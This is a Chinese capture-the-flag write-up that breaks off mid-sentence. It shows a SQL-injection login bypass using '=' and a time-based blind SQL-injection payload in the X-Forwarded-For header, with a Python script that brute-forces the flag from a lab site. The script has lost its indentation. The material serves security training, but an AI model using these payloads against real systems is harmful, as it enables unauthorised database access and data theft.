登录一下好吗
->运算符叫做“指向结构体成员运算符”,是C语言和C++语言的一个运算符,用处是使用一个指向结构体或对象的指针访问其内成员。
登录 用户名-> ‘=’
密码-> ‘=’
那么正常执行的SQL语句就是
select * from 表 where username = “$_POST[‘userneme’]” and password = “$_POST[‘password’]”;
那我们登录执行的SQL语句
select * from 表 where username = “‘‘=’’” and password = “‘‘=’’”;
“‘‘=’’”始终成立,NULL=NULL,就相当于
select * from 表 where 1 and 1;
who are you?
时间盲注,在X-forwarded-for参数中。
主要还是SQL语句的理解:
‘+”+”(select case when (substring((select flag from flag ) from %d for 1 )=’%s’) then sleep(5) else 1 end ) and ‘1’=’1
单引号闭合,后面都是条件子句,
case when then else end
substring
() from for
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
'''Risk2S'''
#引用 模块包
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
guess = string.lowercase+string.uppercase+string.digits+string.punctuation
database=[]
flag = ""
for i in range(1,33):
for str in guess:
headers={
"x-forwarded-for":"xx'+"+"(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(5) else 1 end ) and '1'='1" %(i,str)}
try:
res=requests.get(url,headers=headers,timeout=4)
except requests.exceptions.ReadTimeout, e:
flag = flag + str
print "flag:", flag
break
print 'result:' + flag
天网管理系统
源码,提示:<!-- $test=$_GET['username']; $test